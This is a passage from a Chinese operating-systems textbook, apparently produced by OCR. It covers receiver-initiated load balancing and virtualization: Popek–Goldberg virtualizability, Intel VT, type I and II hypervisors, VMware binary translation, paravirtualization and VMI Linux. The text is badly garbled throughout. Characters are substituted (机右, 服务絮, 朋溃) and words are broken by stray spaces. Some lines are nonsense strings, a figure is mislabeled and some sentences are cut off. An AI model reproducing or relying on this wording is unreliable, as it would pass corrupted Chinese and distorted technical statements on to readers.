只 要 有 一 个 进程 结束 ， 系 统 就 检查 是 否 有 足够 的 工作 可 做 。 如 果 不 
古 ， 它 随机 远 择 菏 台 机 器 并 要 求 它 提供 工作 。 如 果 该 台 机 右 没 有 可 所 
供 的 工作 ， 会 接着 询问 第 二 人 台 ， 人 然后 是 第 三 台 机 器 。 如 有 果 在 N 次 探查 之 
后 ， 还 是 没有 找到 工作 ， 该 节点 暂时 停止 询问 ， 去 做 任何 已 经 安排 好 
的 工作 ， 而 在 下 一 个 进程 结束 之 后 机 万 会 再 次 进行 询问 。 如 采 没 有 可 
做 的 工作 ， 机 器 束 开 始 空间 。 在 经 过 固定 的 时 间 间 隔 之 后 ， 它 义 开 始 


TRE ° 


这 个 算法 的 优点 是 ， 在 关键 时 刻 它 不 会 对 系统 增加 额外 的 负担 。 
发 送 首 发 起 的 算法 在 机 右 最 不 能 够 容 妨 时 一 一 些 时 系统 已 是 负载 相当 
重 了 ,做 了 大 量 的 探查 工作 。 有 了 接收 者 发 起 算法 ， 当 系统 人 负载 很 重 
时 ， 一 台 机 融 处 于 非 充 分 工作 状态 的 机 会 是 很 小 的 。 但 是 ， 当 这 种 情 
形 确 实 发 生 时 ， 它 整 会 较 容易 地 找到 可 承接 的 工作 。 当 然 ， 如 果 没 有 
什么 工作 可 做 ， 接 收 首 发 起 算法 也 会 制造 出 大 量 的 探查 流量 ， 因 为 所 
有 失业 的 机 画 都 在 拼命 地 寻找 工作 。 不 过 ， 在 系统 轻 载 时 增加 系统 的 
负载 要 远 远 好 于 在 系统 过 载 时 再 增加 负载 。 


把 这 两 种 算法 组 合 起 来 是 有 可 能 的 ， 当 机 器 工作 太 多 时 可 以 试图 
凶 挥 一 些 工 作 ， 而 在 工作 不 多 时 可 以 笑 试 得 到 一 些 工 作 。 此 外 ， 机 器 
也 许可 以 通过 保留 一 份 以 往 探 查 的 历史 记录 (用 以 确定 古 否 有 机 器 经 


常 性 处 于 轻 载 或 过 载 状态 ) 来 对 随机 轮 询 的 方法 进行 改进 。 可 以 首先 
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工作 。 


8.3 ”虚拟 化 


在 某 些 环境 下 ， 一 个 机 构 拥有 多 计算 机 系统 ， 但 事实 上 却 并 不 真 
正和 需要 它 。 一 个 常见 的 例子 是 ， 一 个 公司 同时 拥有 一 台电 子 邮 件 服务 
絮 、 一 台 Web 服 务 器 、 一 台 FTP 服 务 器 、 一 些 电 子 商 务 服务 器 和 其 他 服 
务 嚣 。 这 些 服务 器 运行 在 同一 个 设备 染 上 的 不 同 计算 机 中 ， 彼 此 之 间 
连接 ， 也 就 是 说 ， 组 成 一 个 多 计算 机 系统 。 在 有 些 情况 
， 这 些 服 务 器 运行 在 不 同 的 机 器 上 古 因 为 单独 的 一 台 机 器 难以 承受 
这 样 的 负载 ， 但 是 在 更 多 其 他 的 情况 下 ， 这 些 服务 万 不 能 作为 进程 运 
行 在 同一 台 机 器 上 最 重要 的 原因 是 可 靠 性 (reliability) : 现实 中 不 能 
相信 操作 系统 可 以 一 天 24 小 时 ， 一 年 365 或 366 天 连续 无 故障 地 运行 。 
通过 把 每 个 服务 句 放 在 不 同 机 器 上 的 方法 ， 即 使 其 中 的 一 台 服 务 锅 出 
并 了 ， 至 少 其 他 的 服务 絮 不 会 受到 影响 。 虽 然 这 样 做 能 够 达到 容错 的 
要 求 ， 但 是 这 种 解决 方法 太 过 昂 喧 且 难 以 管理 ， 因 为 涉及 太 多 的 机 
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那 应 该 怎么 做 呢 ? 已 经 有 了 四 十 多 年 发 展 历史 的 虚拟 机 技术 ， 通 
常 简称 为 虚拟 化 (virtualization) ， 作 为 一 种 解决 方法 被 提 了 出 来 ， 就 
像 我 们 在 1.7.5 小 市 中 所 讨论 的 那样 。 这 种 技术 允许 一 台 机 右 中 存在 多 
台 虚 拟 机 ， 每 一 全 虚拟 机 可 能 运行 不 同 的 操作 系统 。 这 种 方法 的 好 处 
在 于 ， 一 台 虚 拟 机 上 的 错误 不 会 自动 地 使 其 他 虚拟 机 瑶 溃 。 在 一 个 虚 


拟 化 系统 中 ， 不 同 的 服务 器 可 能 运行 在 不 同 的 虚拟 机 中 ， 因 此 你 持 了 
多 计算 机 系统 局 部 性 错误 的 模型 ， 但 是 代价 更 低 、 也 更 易于 维护 。 


当然 ， 如 此 来 联合 服务 右 看 起 来 号 像 是 把 所 有 的 鸡蛋 放 在 一 个 监 
于 里 一 样 。 如 琳 运 行 所 有 虚拟 机 的 服务 右 朋 演 了 ， 其 结果 比 单独 一 台 
专用 服务 器 朋 涡 要 严重 得 多 。 但 是 虚拟 化 技术 能 够 起 作用 的 原因 在 于 
大 多 数 服 务 占 集 机 的 原因 不 古 因为 硬件 的 故障 ， 而 是 因为 爱 肿 、 不 可 
靠 、 有 漏洞 的 软件 ， 特 别 是 操作 系统 。 使 用 虚拟 化 技术 ， 惟 一 一 个 运 
行 在 内 核 态 的 软件 是 管理 程序 (hypervisor) ， 它 的 代码 量 比 一 个 完整 
操作 系统 的 代码 量 少 两 个 数量 级 ， 也 吏 意 味 着 软件 中 的 漏洞 数 也 会 少 
两 个 数量 级 。 


除了 强大 的 隔离 性 ， 在 虚拟 机 上 运行 软件 还 有 其 他 的 好 处 。 其 中 
之 一 距 古 减少 了 物理 机 器 的 数量 从 而 节省 了 人 硬件、 电源 的 开支 以 及 占 
用 更 少 的 空间 。 对 于 一 个 公司 ， 比 如 说 亚马逊 (Amazon) 、 雅 虎 
(Yahoo) 、 微 软 (Microsoft) 以 及 谷歌 (Google) , EAA RTE 
万 的 服务 大 运行 不 同 的 任务 ， 减 少 它们 数据 中 心 对 物理 机 需 的 需求 意 
味 看 市 省 一 大 笔 开 文 。 举 个 有 代表 性 的 例子 ， 在 大 公司 里 ， 不 同 的 部 
门 或 小 组 想 出 了 一 个 有 趣 的 想法 ， 然 后 去 买 一 台 服 务 右 来 实现 写 。 如 
果 想 法 不 断 产 生 ， 就 需要 成 百 上 千 的 服务 器 ， 公 司 的 数据 中 心 束 会 扩 
张 。 把 一 球 软 件 移 动 到 已 有 的 机 历 上 通 闻 会 很 困难 ， 这 是 因为 每 一 款 
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等 。 使 用 虚拟 机 ， 每 款 软件 都 可 以 携 市 属于 目 己 的 环境 。 


虚拟 机 的 另 一 个 好 处 在 于 检查 点 和 虚拟 机 的 迁移 例如， 在 多 个 
服务 器 间 迁 移 以 达到 负载 平衡 ) 比 在 一 个 普通 的 操作 系统 中 进行 进程 
迁移 更 加 容易 。 在 后 一 种 情况 下 ， 相 当 数 量 的 进程 关键 状态 信息 都 被 
保存 在 操作 系统 表 当 中 ， 包 丘 与 打开 文件 、 和 警报 、 信 和 号 处 理 函 数 等 有 
关 的 信息 。 当 迁移 一 个 虚拟 机 的 时 候 ， 所 需要 移动 的 仅仅 是 内 存 映 
像 ， 因 为 在 移动 内 存 映像 的 同时 所 有 的 操作 系统 表 也 会 移动 。 


虚拟 机 的 男 一 个 用 途 古 运行 那些 不 再 被 支持 或 不 能 在 当前 硬件 上 
工作 的 操作 系统 (或 操作 系统 版 本 ) 中 的 遗留 应 用 程序 (legacy 
application) 。 这 些 应 用 程序 可 以 和 当前 的 应 用 程序 在 相同 的 硬件 上 运 
行 。 事 实 上 ， 文 持 同 时 运行 使 用 不 同 操作 系统 的 应 用 程序 是 赞成 虚拟 
机 技术 的 一 个 重要 理由 。 


同时 ， 虚 拟 机 的 一 个 重要 应 用 是 软件 开发 。 一 个 程序 员 想 要 确保 
他 的 软件 在 Windows 98、Windows 2000、Windows XP ` Windows 
Vista、 多 种 Linux 版 本 、FreeBSD、OpenBSD、NetBSD 和 Mac OS X E 
都 可 以 正常 运行 ， 他 不 需要 有 一 打 的 计算 机 ， 以 及 在 不 同 的 计算 机 上 
安装 不 同 的 操作 系统 。 相 反 ， 他 只 需要 在 一 人 台 物 理 机 上 创建 一 些 虚 拟 
机 ， 然 后 在 每 个 虚拟 机 上 安装 不 同 的 操作 系统 。 当 然 ， 这 个 程序 员 可 
以 给 他 的 磁盘 分 区 ， 然 后 在 每 个 分 区 上 安 效 不 同 的 操作 系统 ， 但 是 这 


种 方法 太 过 困难 。 首 先 ， 不 论 人 磁盘 的 容量 有 和 多大， 标准 的 PC 机 只 文 持 
四 个 主 分 区 。 其 次 ， 尽 管 在 引导 块 上 可 以 安装 一 个 多 引导 程序 ， 但 要 
运行 男 一 个 操作 系统 号 必须 重 局 计算 机 。 使 用 虚拟 机 ， 所 有 的 操作 系 
统 可 以 同时 运行 ， 因 为 它们 都 只 是 美妙 的 进程 。 


8.3.1 ”虚拟 化 的 条 件 


我 们 在 第 1 章 中 看 到 ， 有 两 种 虚拟 化 的 方法 。 一 种 管理 程序 

(hypervisor) ， 又 称 为 型 管理 程序 (或 虚拟 机 监控 器 ， 如 图 1-29a 
所 示 。 实 质 上 ， 它 就 是 一 个 操作 系统 ， 因 为 它 是 惟一 一 个 运行 在 内 核 
态 的 程序 。 它 的 工作 是 支持 真 实 硬件 的 多 个 副本 ， 也 称 作 虚 拟 机 

(virtual machine) ， 与 普通 操作 系统 所 支持 的 进程 类 似 。 相 反 ，II 型 
管理 程序 ， 如 图 1-29b 所 示 ， 是 一 种 完全 不 同 的 类 型 。 它 只 是 一 个 运行 
在 诸如 Windows 或 Linux 平 台 上 ， 能 够 “解释 ”机 器 指令 集 的 用 户 程序 ， 
它 也 创建 了 一 个 虚拟 机 。 我 们 把 “解释 ”二 字 加 上 引号 是 因为 通常 代码 
块 是 以 特殊 的 方式 进行 处 理 然后 缓存 并 且 直 接 执行 从 而 获得 性 能 上 的 
提升 ， 但 是 在 原理 上 ， 完 全 解释 也 是 可 行 的 ， 虽 然 速 度 很 慢 。 两 种 情 
况 下 ， 运 行 在 管理 程序 上 的 操作 系统 都 称 为 客户 操作 系统 (guest 
operating system) 。 在 II 型 管理 程序 的 情况 下 ， 运 行 在 硬件 上 的 操作 系 
统称 为 宿主 操作 系统 (host operating system) 。 


在 两 种 情况 下 ， 虚 拟 机 都 必须 像 真实 机 噩 一 样 工作 ， 认 识 到 这 一 
点 非常 重要 。 也 吏 是 说 ， 必 须 能 够 像 真 实 机 硕 那 样 局 动 虚拟 机 ， 像 真 
实 的 机 器 那样 在 其 上 安 流 任意 的 操作 系统 。 管 理 程序 的 任务 就 古 提 供 


虚拟 机 有 两 种 类 型 的 原因 与 Intel 386 体 系 结构 的 缺陷 有 关 ， 而 这 
些 缺 陷 在 20 年 间 以 向 后 兼容 的 名 义 被 言 目地 不 断 推进 到 新 的 CPU 中 。 
简单 地 说 ， 每 个 有 内 核 态 和 用 户 态 的 处 理 器 都 有 一 组 只 能 在 内 核 态 执 
行 的 指令 集合 ， 比 如 IO 指令 、 改 变 MMU 状 态 的 指令 等 。Popek 和 
Goldberg (1974) 两 人 在 他 们 的 经 典 虚 拟 化 工作 中 称 这 些 指令 为 敏感 
指令 (sensitive instruction) 。 还 有 一 些 指令 如 果 在 用 户 态 下 执行 会 引 
起 陷入 。Popek 和 Goldberg 称 它们 是 特权 指令 (privileged 
instruction) 。 在 他 们 的 论文 中 首次 论述 指出 ， 当 且 仅 当 敏 感 指 令 是 特 
权 指 令 的 子 集 时 ， 机 器 才 是 可 虚拟 化 的 。 简 单 地 说 ， 如 果 你 想 做 一 些 
在 用 户 态 下 不 能 做 的 工作 ， 硬 件 应 该 陷入 。IBM/370 具 有 这 种 特性 ， 
但 是 与 它 不 同 ，386 体 系 结构 不 具有 这 种 特性 。 有 一 些 敏感 的 386 指 令 
如 果 在 用 户 态 下 执行 就 会 被 忽略 。 举 例 来 说 ，POPF 指 令 蔡 换 标志 寄存 
器 ， 会 改变 允许 /禁止 中 断 的 标志 位 。 但 是 在 用 户 态 下 ， 这 个 标志 位 不 
被 改变 。 所 以 ，386 体 系 结构 和 它 的 后 代 都 是 不 可 虚拟 化 的 ， 也 就 是 说 
它们 不 能 支持 I 型 管理 程序 。 


FXE, Eok Ea TA eR EE o GR RETA SE 
户 态 不 能 陷入 之 外 ， 还 有 一 些 指令 可 以 在 用 户 仿 读 取 敏 感 状态 而 不 引 
起 陷入 。 比 如 ， 在 Pentium 处 理 絮 上 ， 一 个 程序 可 以 读 取 代码 段 选择 子 
(selector) 的 值 从 而 判断 它 是 运行 在 用 户 态 还 是 内 核 态 上 。 如 果 一 个 
操作 系统 做 同样 的 事情 ， 然 后 发 现 它 运行 在 用 户 态 ， 那 么 束 可 能 据 此 
作出 不 正确 的 判断 。 


从 2005 年 开始 ，Intel/ 和 AMD 公 司 在 它们 的 处 理 器 上 引进 了 虚拟 化 
技术 ， 从 而 使 问题 得 到 了 解决 。 在 Intel Core 2CPU 上 ， 这 种 技术 称 为 
VT (Virtualization Technology) 。 在 AMD Pacific CPU 上 ， 这 种 技术 称 
为 SVM (Secure Virtual Machine) 。 在 下 文 里 ， 我 们 一 般 使 用 VT 这 个 
词 来 代表 。 它 们 的 灵感 都 来 自 于 IBM VM/370， 但 是 也 有 一 些 细微 的 不 
同 之 处 。 基 本 的 思想 是 创建 容器 使 得 虚拟 机 可 以 在 其 内 运行 。 当 一 个 
客户 操作 系统 在 一 个 容器 内 启动 ， 它 将 继续 运行 直到 它 引 发 了 异常 而 
陷入 到 管理 程序 。 例 如 ， 执 行 一 条 IO 指令 。 陷 入 操作 由 管理 程序 通过 
硬件 位 图 集 来 管理 。 有 了 这 些 扩展 ， 经 典 的 “陷入 -仿真 ”类 型 的 虚拟 化 
方法 才 成 为 可 能 。 


8.3.2 ”I 型 管理 程序 


可 虚拟 化 下 一 个 重要 的 问题 ， 所 以 让 我 们 来 更 仔细 地 研究 一 下 。 
在 图 8-26 中 ， 我 们 可 以 看 到 一 个 文 持 一 人 台 虚 拟 机 的 I 型 管理 程序 。 像 所 
有 的 I 型 管理 程序 一 样 ， 它 在 裸 机 上 运行 。 虚 拟 机 在 用 户 态 以 用 户 进 程 
的 身份 运行 ， 因 此 ， 它 不 允许 执行 敏感 指令 。 虚 拟 机 内 运行 着 一 个 客 
户 操作 系统 ， 该 客户 操作 系统 认为 目 己 是 运行 在 内 核 态 的 ， 但 是 实际 
上 它 是 运行 在 用 户 态 的 。 我 们 把 这 种 状态 称 为 虚拟 内 核 态 (virtual 
kernel mode) ° 虚拟 机 内 还 运行 着 用 户 进程 ， 这 些 进 程 认为 自己 是 运 
行 在 用 户 态 的 (事实 上 也 正 是 如 此 ) 。 


用 户 进程 
虚拟 机 用 户 态 
客户 操作 系统 虚拟 内 核 态 


I 型 管理 程序 


访问 特权 指令 时 陷入 


图 8-26 当 虚 拟 机 当中 的 操作 系统 执行 了 一 个 内 核 指令 时 ， 如 果 文 持 
虚拟 化 技术 ， 那 么 它 会 陷入 到 管理 程序 


当 操作 系统 (认为 自己 运行 在 内 核 态 ) 执行 一 条 敏感 指令 (只 在 
内 核 态 下 可 以 执行 ， 的 时 候 会 发 生 什么 事情 呢 ? 在 不 支持 VT 技术 的 处 
理 器 上 ， 指 令 失效 并 且 操 作 系统 通常 情况 下 会 朋 溃 。 这 意味 着 虚拟 化 
是 不 可 行 的 。 有 人 争辩 说 所 有 在 用 户 态 执行 的 敏感 指令 都 应 该 陷入 ， 
但 那 不 是 386 和 它 的 non-VT 后 代 们 的 工作 模式 。 


在 支持 VT 技术 的 处 理 器 上 ， 当 客户 操作 系统 运行 一 条 敏感 指令 
时 ， 发 生 到 内 核 的 陷入 ， 如 图 8-26 所 示 。 管 理 程序 分 析 指 令 ， 查 看 它 是 
来 自 于 虚拟 机 中 的 客户 操作 系统 还 是 来 自 于 虚拟 机 中 的 用 户 程序 。 如 
果 是 前 一 种 情况 ， 管 理 程序 调度 将 要 执行 的 指令 ， 如 末 是 后 一 种 情 
况 ， 它 仿真 面 对 运 行 在 用 户 态 的 敏感 指令 时 真实 硬件 的 行为 。 如 果 虚 
拟 机 不 文 持 VT 扩 术 ， 指 令 通关 会 被 忽略 ;如 果 庶 拟 机 文 持 VT 技 术 ， 它 
陷入 到 虚拟 机 的 客户 操作 系统 


8.3.3 II 型 管理 程序 


当 采 用 VT 技术 的 时 候 ， 建 立 一 个 虚拟 机 系统 相对 比较 直接 ， 但 是 
在 VT 技术 出 现 之 前 ， 人 们 是 怎么 做 的 呢 ? 很 明显 ， 在 一 台 虚 拟 机 上 运 
行 完整 的 操作 系统 是 不 可 行 的 ， 因 为 (一些 ) 敏感 指令 会 被 忽略 掉 ， 
从 而 导致 系统 怖 溃 。 于 是 人 们 发 明了 称 为 IJ 型 管理 程序 的 替代 品 ， 如 
图 1-29b 所 示 。 最 早 的 一 代 产 品 是 VMware (Adams 和 Agesen，2006; 


以 及 Waldspurger，2002) ， 它 是 斯 坦 福 大 学 (Bugnion 等 人 ，1997) 
DISCO 研 究 项 目的 发 展 成 果 。VMware 在 Windows 或 Linux 的 宿主 操作 
系统 上 作为 普通 用 户 程序 运行 。 当 它 第 一 次 运行 的 时 候 ， 它 就 像 是 一 
个 新 局 动 的 计算 机 ， 试 图 在 光驱 中 寻找 含有 操作 系统 的 光盘 。 然 后 通 
过 运行 光盘 上 的 安装 程序 ， 在 它 的 虚拟 磁盘 (实际 上 就 是 Windows 或 
Linux 文 件 ) 上 安装 操作 系统 。 一 旦 在 虚拟 磁盘 上 安装 好 了 客户 操作 系 
统 ， 虚 拟 机 就 可 以 运行 了 。 


现在 让 我 们 来 仔细 研究 VMware 是 如 何 工 作 的 。 当 运行 一 个 
Pentium 二 进 制 文件 的 时 候 ， 这 个 二 进 制 文 件 可 能 来 目 于 安 闭 光盘 或 虚 
拟 磁盘 ，VMware 首 先 浏 览 代码 段 以 寻找 基本 块 (basic block) 。 所 谓 
基本 块 ， 是 指 以 jump 指 令 、call 指 令 、trap 指 令 或 其 他 改变 控制 流 的 指 
令 结 束 的 可 顺序 运行 的 指令 序列 。 根 据 定义 ， 除 了 基本 块 的 最 后 一 条 

站 令 ， 基 本 块 内 不 会 舍 有 其 他 改变 程序 计数 器 的 指令 。 检 查 基本 块 十 


为 了 找 出 该 基本 块 中 是 否 含有 敏感 指令 〈 见 Popek 和 Goldberg 的 论 

述 ) 。 如 果 基 本 块 中 含有 敏感 指令 ， 每 条 敏感 指令 被 替换 成 处 理 相应 
情况 的 VMware 过 程 调用 。 基 本 块 的 最 后 一 条 指令 也 被 VMware 的 过 程 
调用 所 符 代 。 


上 壕 操 作 完 成 之 后 ， 基 本 块 在 VMware 中 缓存 并 执行 。 在 VMware 
中 ， 不 含 任何 敏感 指令 基本 块 的 运行 与 它 在 裸 机 上 的 运行 完全 相同 
一 一 因为 它 就 是 在 裸 机 上 运行 的 。 通 过 这 种 方式 找 出 、 念 真 敏感 指 
o 这 种 技术 称 为 二 进 制 翻译 (binary translation) ° 


基本 块 执行 结束 之 后 ， 探 制 返 回 到 VMware， 它 会 定位 下 一 个 基 
本 块 的 位 置 。 如 果 下 一 个 基本 块 已 经 翻译 完毕 ， 它 就 可 以 被 立刻 执 
行 。 如 果 还 没有 翻译 完毕 ， 那 么 依次 进行 翻译 、 缓 存 、 执 行 。 最 后 ， 
大 多 数 程序 被 缓存 并 且 接 近 全 速 的 执行 。 很 多 优化 方法 得 到 了 运用 ， 
例如 ， 如 果 一 个 基本 块 跳 转 或 调用 另 一 个 基本 块 ， 最 后 一 条 指令 被 一 
条 跳 转 或 调用 已 翻译 好 的 基本 块 的 指令 所 代替 ， 从 而 节省 了 寻找 后 续 
基本 块 的 开销 。 同 样 ， 在 用 户 程 序 中 不 需要 替换 掉 敏感 指令 ， 因 为 硬 
件 会 直接 忽略 它们 。 


讲 到 这 里 ， 即 使 在 不 可 虚拟 化 的 硬件 上 ，I 型 管理 程序 也 能 正常 
工作 的 原因 束 已 经 很 清楚 了 : 所 有 的 敏感 指令 被 仿真 这 些 指令 的 过 程 
调用 所 替代 。 客 户 操作 系统 发 射 的 敏感 指令 不 会 家 真 正 的 硬件 执行 。 
它们 转换 成 了 对 管理 程序 的 调用 ， 而 这 些 调 用 仿真 了 那些 敏感 指令 。 


有 人 可 能 会 天 真 地 认为 文 持 VI 技 术 的 处 理 器 在 性 能 上 会 胜 过 II 型 
管理 程序 所 使 用 的 软件 技术 ， 但 是 测量 结果 显示 情况 并 不 是 这 么 简单 
(Adams 和 Agesen，2006) 。 其 结果 显示 ， 文 持 VT 技 术 的 硬件 使 用 陷 
入 一 一 仿真 的 方法 会 引起 太 多 的 陷入 ， 而 在 现代 硬件 上 ， 陷 入 的 代价 
是 非常 昂贵 的 ， 它 们 会 清空 处 理 器 内 的 缓存 、TLB 和 分 支 预 测 表 。 相 
反 ， 当 可 执行 程序 中 的 敏感 指令 被 VMware 过 程 调用 所 替代 ， 就 不 会 
招致 这 些 切换 开销 。 正 如 Adams 和 Agesen 所 指出 的 ， 根 据 工作 负载 的 
不 同 ， 软 件 有 的 时 候 会 击败 硬件 。 由 于 这 个 原因 ， 一 些 I 型 管理 程序 出 
于 对 性 能 的 考虑 会 进行 二 进 制 翻译 ， 尽 管 即使 不 进行 转换 ， 运 行 于 其 
上 的 软件 也 可 以 正确 运行 。 


8.3.4” 准 虚拟 化 


运行 在 I 型 和 II 型 管理 程序 之 上 的 都 是 没有 修改 过 的 客 尸 操作 系 
统 ， 但 是 这 两 类 管理 程序 为 了 获得 合理 的 性 能 都 备 受 并 散 。 男 一 个 逐 
渐 开 始 流 行 起 来 的 处 理 方法 古玩 改 客户 操作 系统 的 源 代码 ， 从 而 略 过 
敏感 指令 的 执行 ， 转 而 调用 管理 程序 调用 。 事 实 上 ， 对 客户 操作 系统 
来 说 号 像 是 用 户 程序 调用 操作 系统 (管理 程序 ) 系统 调用 一 样 。 当 采 
用 这 种 方法 时 ， 管 理 程序 必须 定义 由 过 程 调用 集合 组 成 的 接口 以 供 客 
户 操作 系统 使 用 。 这 个 过 程 调用 集合 实际 上 形成 了 API (应 用 程序 编程 
接口 ) ， 尽 管 这 个 接口 是 供 客户 操作 系统 使 用 ， 而 不 是 应 用 程序 。 


再 进一步 ， 从 操作 系统 中 移 除 所 有 的 敏感 指令 ， 只 让 操作 系统 调 
用 管理 程序 调用 (hypervisor call) 来 获得 诸如 IO 操作 等 系统 服务 ， 通 
过 这 种 方式 我 们 就 已 经 把 管理 程序 变 成 了 一 个 微 内 核 ， 如 图 1-26 所 示 。 
些 或 全 部 敏感 指令 有 意 移 除 的 客户 操作 系统 称 为 准 虚 拟 化 的 
(paravirtualized) ” (Barham 等 人 ，2003; Whitaker 等 人 ，2002) 。 仿 真 
特殊 的 机 器 指令 是 一 件 让 人 厌倦 的 、 耗 时 的 工作 。 它 需要 调用 管理 程 
序 ， 然 后 仿真 复杂 指令 的 精确 语义 。 让 客户 操作 系统 直接 调用 管理 程 
序 《或 者 微 内 核 ) 完成 IO 操 作 等 任务 会 更 好 。 之 前 的 管理 程序 都 选择 
模拟 完整 的 计算 机 ， 其 主要 原因 在 于 客户 操作 系统 的 源 代 码 不 可 获得 
(如 Windows) 、 或 源 代码 种 类 太 多 样 (如 Linux) 。 也 许 在 将 来 ， 管 


理 程 序 / 微 内 核 的 API 接 口 可 以 标准 化 ， 然 后 后 续 的 操作 系统 都 会 调用 
该 API 接 口 而 不 是 执行 敏感 指令 。 这 样 的 做 法 将 使 得 虚拟 机 技术 更 容易 
被 支持 和 使 用 。 


全 虚拟 化 和 准 虚 拟 化 之 则 的 区 别 如 图 8-27 所 示 。 在 这 里 ， 我 们 有 两 
台 虚 拟 机 运行 在 支持 VT 技术 的 硬件 上 。 左 边 ， 客 户 操作 系统 是 一 个 没 
有 经 过 修改 的 Windows 版 本 。 当 执行 敏感 指令 的 时 候 ， 硬 件 陷入 到 管理 
程序 ， 由 管理 程序 仿真 执行 它 随后 返回 。 右 边 ， 客 户 操 作 系 统 是 一 个 
经 过 修改 的 Linux 版 本 ， 其 中 不 含 敏感 指令 。 当 它 需 要 进行 WO 操作 或 修 
改 重 要 内 部 寄存 器 〈 如 指向 页 表 的 寄存 器 ) 时 ， 它 调用 管理 程序 例 程 
来 完成 这 些 工 作 ， 就 像 在 标准 Linux 系 统 中 应 用 程序 调用 操作 系统 系统 
调用 一 样 。 


如 图 8-27 所 示 ， 管 理 程序 被 一 条 虚线 分 成 两 个 部 分 。 而 在 现实 中 ， 
只 有 一 个 程序 在 硬件 上 运行 。 它 的 一 部 分 用 来 解释 陷入 的 敏感 指令 ， 
这 种 情况 下 ， 请 参照 Windows 一 边 。 男 一 部 分 用 来 执行 管理 程序 例 程 。 
在 图 8-27 中 ， 后 一 部 分 被 标记 为 “ 微 内 核 ”。 如 采 管 理 程序 只 是 用 来 运行 
准 虚 拟 化 的 客户 操作 系统 ， 就 不 需要 对 敏感 指令 进行 仿真 ， 这 样 ， 我 
们 束 获 得 了 一 个 真正 的 微 内 核 ， 这 个 微 内 核 只 提供 最 基本 的 服务 ， 诸 
如 进程 分 派 、 管 理 MMU 等 。I 型 管理 程序 和 微 内 核 之 间 的 界限 越 来 越 模 
糊 ， 当 管理 程序 获得 越 来 越 多 的 功能 和 例 程 时 ， 这 个 界限 变 得 更 加 不 
清晰 。 这 个 主题 是 有 和 争议 的 ， 但 古 这 一 点 越 来 越 明 确 : 以 内 核 态 运行 


在 硬件 上 的 程序 应 当 短 小 、 可 靠 ， 由 数 千 行 代 码 而 不 是 数 百 万 行 代码 
组 成 。 这 个 话题 已 经 经 过 很 多 学 者 的 讨论 (Hand, 2005; Heiser 等 


A, 2006; Hohmuth A, 2004; Roscoe 等 人 ，2007) 。 
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图 8-27 SCHR TE ELI E IEF 


对 客户 操作 系统 进行 准 虚 拟 化 引起 了 很 多 问题 。 第 一 ， 如 果 所 有 
的 敏感 指令 都 被 管理 程序 例 程 所 代替 ， 操 作 系 统 如 何在 物理 机 器 上 运 
行 呢 ? 毕竟 ， 硬 件 不 可 能 理解 管理 程序 例 程 。 第 二 ， 如 果 市 场 上 有 很 
多 种 管理 程序 ， 例 如 Vmware、 剑 桥 大 学 开发 的 开源 项 目 Xen、 微 软 的 
Viridian， 这 些 管理 程序 的 API 接 口 不 同 ， 应 该 怎么 办 呢 ? 怎 样 修改 内 核 
使 它 能 够 在 所 有 的 管理 程序 上 运行 ? 


Amsden 等 人 (2006) 提出 了 一 个 解决 方案 。 在 他 们 的 模型 当中 ， 
当 内 核 需 要 执行 一 些 敏感 操作 时 会 转 而 调用 特殊 的 例 程 。 这 些 特殊 的 


例 程 ， 称 作 VMI (虚拟 机 接口 ) ， 形 成 的 低层 与 硬件 或 管理 程序 进行 
交互 。 这 些 例 程 被 设计 得 通用 化 ， 不 依赖 于 硬件 或 特定 的 管理 程序 。 


这 种 技术 的 一 个 示例 如 图 8-28 所 示 ， 这 是 一 个 准 虚拟 化 的 Linux 版 
本 ， 称 为 YMI Linux (VMIL) 。 当 VMI Linux 运 行 在 硬件 上 的 时 候 ， 它 
链接 到 一 个 发 射 人 敏感 指令 来 完成 工作 的 函数 库 ， 如 图 8-28a 所 示 。 当 它 
运行 在 管理 程序 上 ， 如 VMware 或 Xen， 客 户 操作 系统 链接 到 另 一 个 画 
数 库 ， 该 函数 库 提 供 对 下 层 管理 程序 的 适当 (或 不 同 ) 例 程 调用 。 通 
过 这 种 方式 ， 操 作 系统 的 内 核 保持 了 可 移植 性 和 高 效 性 ， 可 以 适应 不 
同 的 管理 程序 。 


VMI Linux 


VMIL 到 Xen 的 库 


管理 程序 调用 


VMI Linux 


VMIL 到 Vmware 的 库 


管理 程序 调用 


VMIL 硬件 接 口 库 


由 便 件 执行 
的 敏感 指令 


a) b) c) 


图 8-23 VMI Linux 运 行 在 : a) 硬 件 裸 机 ; b)VMware; c)XenE 


关于 虚拟 机 接口 还 有 很 多 其 他 的 建议 。 其 中 比较 流行 的 一 个 是 
paravirt ops。 它 的 主要 思想 与 我 们 上 面 所 介绍 的 相似 ， 但 是 在 细 广 上 有 


所 不 同 。 


8.3.5 内存 的 虚拟 化 


现在 我 们 已 经 知道 了 如 何 虚 拟 化 处 理 右 。 但 是 一 个 计算 机 系统 不 
止 是 一 个 处 理 器 。 它 还 有 内 存 和 WO 设备 。 它 们 也 需要 虚拟 化 。 让 我 们 
来 看 看 它们 是 如 何 实现 的 。 


几乎 全 部 的 现代 操作 系统 都 文 持 虚 拟 内 存 ， 即 从 虚拟 地 址 空间 到 
物理 地 址 空间 的 页 面 映 射 。 这 个 映射 由 〈 多 级 ) 页 表 所 定义 。 通 过 操 
作 系 统 设置 处 理 右 中 的 控制 寄存 器 ， 使 之 指 癌 顶 级 页 表 ， 从 而 动态 设 
置 页 面 映 冉 。 虚 拟 化 技术 使 得 内 存 管 理 更 加 复杂 。 


例如 ， 一 台 虚 拟 机 正在 运行 ， 其 中 的 客户 操作 系统 希望 将 它 的 虚 
拟 页 面 7、4、3 分 别 映 射 到 物理 页 面 10、11、12。 它 建立 包 侣 这 种 映射 
关系 的 页 表 ， 加 载 指 向 顶级 页 表 的 硬件 寄存 器 。 这 条 指令 是 敏感 指 
令 。 在 支持 VT 技术 的 处 理 器 上 ， 将 会 引起 陷入 ; 在 VMware 管 理 程序 
上 ， 它 将 会 调用 VMware 例 程 ;在 准 虚 拟 化 的 客户 操作 系统 中 ， 它 将 
会 调用 管理 程序 调用 。 简 单 地 讲 ， 我 们 假设 它 陷 入 到 了 I 型 管理 程序 
中 ， 但 实际 上 在 上 述 三 种 情况 下 ， 问 题 都 是 相同 的 。 


那么 管理 程序 会 怎么 做 呢 ? 一 种 解决 办 法 是 把 物理 页 面 10、11、 
12 分 配给 这 人 台 虚 拟 机 ， 然 后 建立 真实 的 页 表 使 之 分 别 映 里 到 该 虚拟 机 
的 虚拟 页 面 7、4、3， 随 后 使 用 这 些 页 面 。 到 目前 为 止 还 没有 问题 。 现 


